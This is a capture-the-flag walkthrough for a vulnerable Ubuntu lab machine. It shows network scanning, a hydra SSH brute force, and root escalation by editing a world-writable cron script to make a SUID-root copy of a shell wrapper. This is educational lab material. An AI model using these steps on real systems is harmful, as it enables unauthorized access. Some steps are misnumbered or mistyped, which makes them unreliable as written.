**Note: The content in this article is only for educational purposes and understanding of cybersecurity concepts. It should enable people and organizations to have a better grip on threats and know how to protect themselves against them. Please use this information responsibly.**
Welcome to the Ubuntu Challenge: an entertaining, hands-on, practical exercise testing your system hacking capabilities. In this challenge, the objective is to gain a root shell in a vulnerable Ubuntu machine and track down a named file called proof.txt. This shall require you to use some ethical hacking techniques, which are to discover vulnerabilities in a system and exploit them through navigation in a relatively precise approach through the system.
The challenge provides an opportunity to practice hacking methodologies in a controlled environment and emphasizes the importance of understanding system security and defensive mechanisms. Remember to follow ethical guidelines while tackling this challenge, as the goal is to learn and improve your skills responsibly.
1. Step 1: $ arp-scan 192.168.64.0/24
Arp-scan: Arp-scan is a network scanning tool that uses ARP (Address Resolution Protocol) to identify devices on a local network. It sends ARP requests to specified IP ranges and listens for responses, effectively mapping active hosts and their MAC addresses. It’s commonly used for network discovery and security auditing.
2.Step 2: $ nmap -v -n -Pn -sV -sC -p- 192.168.64.148
Nmap: Network Mapper is an open-source tool that scans for open ports and services running and also finds vulnerabilities.
-v – verbosity
-n – block the DNS resolution
-Pn – block the ping sweep
-sV – version of specific
-sC – execute default scripts
-p- – all the ports 65535
Now we found that port 21 for FTP, port 22 for SSH, and port 80 for HTTP are open.
Step 3: Open IP 192.168.64.148 on browser.
Let’s explore the robots.txt file on our browser. This is what we get.
Step 4: Going over to /secret, we did not get anything.
Step 5: $ ftp 192.168.64.148
Download lol.pcap
$ get lol.pcap
Step 6: Open the file in Wireshark.
Wireshark: Wireshark is a network sniffing tool. It’s a popular network protocol analyzer.
$ wireshark lol.pcap
Step 7: Open file no. 40
sup3rs3cr3tdirlol
Step 8: Now, on your browser, type $ 192.168.64.148/ to extract the information from it.
Step 9: After opening it, download roflmao.
Step 10: Change the permissions of the file using
$ chmod +x roflmao
$ ./roflmao
Step 11: Open this address 0x0856BF in a browser.
We were not able to find the password, so now we’ll do the reconnaissance again and see if we left something. While looking at the folders in 0x0856BF we found that it shows this_folder_contains_the_password. So, anything inside the folder can be the password. We will pick all the words in the folder having a minimum 4 alphabets, create a new password list, and then attack again.
Step 12: After attacking again, we found the username and password
$ hydra -L user.txt -P passwd.txt 192.168.64.148 ssh
Login: ubuntu password: Pass.txt
With the help of the credentials extracted above, we could successfully SSH login.
Step 13: $ ssh ubuntu@192.168.64.148
Step 14: We have to look for an executable file that is available for all the users.
$ find / -type f -perm 0777 2>dev/null
Step 15: We find a file name /lib/log/cleaner.py after searching for an executable file. Open the file using nano.
$ nano /lib/log/cleaner.py
Step 16: Let us modify this shell.
remove (‘ rm -r /tmp/* ‘)
Step 17: /$ cd /tmp
/tmp$ nano test.c
Step 18: Add a script.
$ system(“/bin/bash”)
Step 19: After compiling test.c we created an object named exploit.
$ /tmp$ gcc test.c -o exploit
Step 20: Open /lib/log/cleaner.py
$ nano /lib/log/cleaner.py
Step 21: As cleaner.py was a cronjob, we took advantage of it. We gave ownership of the exploit (object) to the root user and parallelly gave executable permission to all the types of users.
$ os.system(‘chown root:root /tmp/exploit’)
$ os.system(‘chmod 4777 /tmp/exploit’)
Step 22: After changing the cleaner.py file, we can see that the owner of the exploit file is an Ubuntu user who belongs to the overflow group.
Step 23: Once the system logs us out, log in again, and we can see the owner of the exploit is root and it belongs to group root.
Step 24: Now, as an Ubuntu user, we have permission to execute the exploit file. And after executing, we got root.
Step 25: After getting root access, the machine still logs us out, which means the second cronjob is still running. So, we’ll find the cronjob using the below command:
$ crontab -l
Step 26: Modify the cronjob file.
$ nano /opt/lmao.py
Step 24: Remove the script from there.
Step 25: Inside the root directory we found the flag.
Congratulations!!!!!!!!!!!!!!!!!!!!!!!!!
